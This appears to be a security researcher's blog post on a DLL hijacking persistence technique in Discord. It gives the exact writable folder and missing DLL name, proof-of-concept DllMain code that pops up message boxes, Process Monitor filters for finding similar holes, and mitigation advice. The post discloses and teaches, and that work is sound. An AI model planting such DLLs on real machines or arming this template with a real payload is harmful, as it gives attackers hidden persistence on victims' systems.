DLL Hijacking Persistence Using Discord
How old hacking techniques still work in the present day
After finding a few different persistence methods. I wanted to validate an old DLL Hijacking exploit for persistence. I disclosed a DLL Hijacking vulnerability for Discord, approximately 9 months ago on HackerOne. But it wasn’t accepted as a vulnerability sadly. Because it requires physical access. But some bug bounty’s except them and there are enough possibilities with DLL Hijacking.
Exploitation
In short, there is a DLL Hijacking vulnerability still in Discord. To gain user level persistence by placing a malicious DLL inside the following directory:
%APPDATA%/local/Discord/app-1.0.9004
The DLL name should be: d3d12.dll
It doesn’t require DLL hollowing or something else fancy. So, it will just execute your code.
Creating the DLL
The code used is very straightforward. Just create a new visual studio project with a base Dynamic-Link Library (DLL)
And changed the main function to the code below. So every time something happens to the DLL it will trigger a pop-up message.
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
MessageBox(NULL,
TEXT("DLL Hijacking verified Process Attach"),
TEXT("DLL Hijack BVS"),
MB_ICONERROR | MB_OK);
case DLL_THREAD_ATTACH:
MessageBox(NULL,
TEXT("DLL Hijacking verified Thread Attach"),
TEXT("DLL Hijack BVS"),
MB_ICONERROR | MB_OK);
case DLL_THREAD_DETACH:
MessageBox(NULL,
TEXT("DLL Hijacking verified Thread Detach"),
TEXT("DLL Hijack BVS"),
MB_ICONERROR | MB_OK);
case DLL_PROCESS_DETACH:
MessageBox(NULL,
TEXT("DLL Hijacking verified Proces Detach"),
TEXT("DLL Hijack BVS"),
MB_ICONERROR | MB_OK);
break;
}
return TRUE;
}Now you can create a release build based on the required architecture and use it where ever you please! For all future “low hanging fruit” DLL Hijacking vulnerability checks.
Bringing it into action
When placing your crafted DLL inside the folder. The next time the victim starts discord, the DLL will be loaded. In this case, the DLL will generate a Pop-up for easy verification. (Sometimes it can take a bit of time)
As you can see below an extra Discord process is created which executes the DLL Hijack pop-up
Cross-referencing the PID in task monitor and then in Process Explorer, we can find the correlated command for the execution.
%appdata%\Local\Discord\app-1.0.9007\Discord.exe --type=gpu-process --field-trial-handle=1636,17570466365889041215,795977594926311709,131072 --disable-features=CookiesWithoutSameSiteMustBeSecure,HardwareMediaKeyHandling,MediaSessionService,SameSiteByDefaultCookies,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=5058 --gpu-sub-system-id=695482434 --gpu-revision=161 --gpu-driver-version=31.0.15.2647 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3692 /prefetch:2However, I couldn’t repeat the exploit by rerunning this Discord command in the terminal.
Finding DLL Hijacking vulnerabilities yourself
To find DLL Hijacking vulnerabilities yourself you can use Process Monitor. Process Monitor is an advanced monitoring tool for Windows that shows real-time file system and Registry changes. It comes with with the Sysinternals Package. Which contains a toolkit for all sorts of windows related tasks.
See the links below to download Process Monitor individually or the complete suite through the Microsoft store (which I recommend because it is updated automatically.)
When starting Proces Monitor, you will get overwhelmed by the number of records so it is best to pick your targets and add some filters. For finding DLL Hijacking vulnerabilities the following filters can be used.
It is important to find results with the value NAME NOT FOUND. Indicating that the file is missing and that the Path ends with .dll. To just list .dll files. You can further specify filters for example to only list a specific application.
If you open Discord you will see that the file in question, d3d12.dll is missing. That is why we used it for DLL hijacking.
For detection / mitigation:
- Limit file changes in the %APPDATA% /local/Discord/app-1.0.9004 directory or place your own DLL there and validate for hash changes.
- Monitor this specific DLL name and check if it is loaded into discord.
- For your applications, you can make use of hashing and verify that the hash hasn’t changed before loading the file.
- It is also recommended to not load files from user-writeable locations. especially when requiring higher rights like SYSTEM.
Conclusion
It is interesting how easily someone can get persistence by making use of DLL hijacking. There are numerous applications with this vulnerability, and it is hard to validate them all.
It is shocking how many DLL’s are loaded incorrectly if you monitor them in Process Monitor.
If you want to discuss anything related to infosec I’m on LinkedIn: https://www.linkedin.com/in/bobvanderstaak/
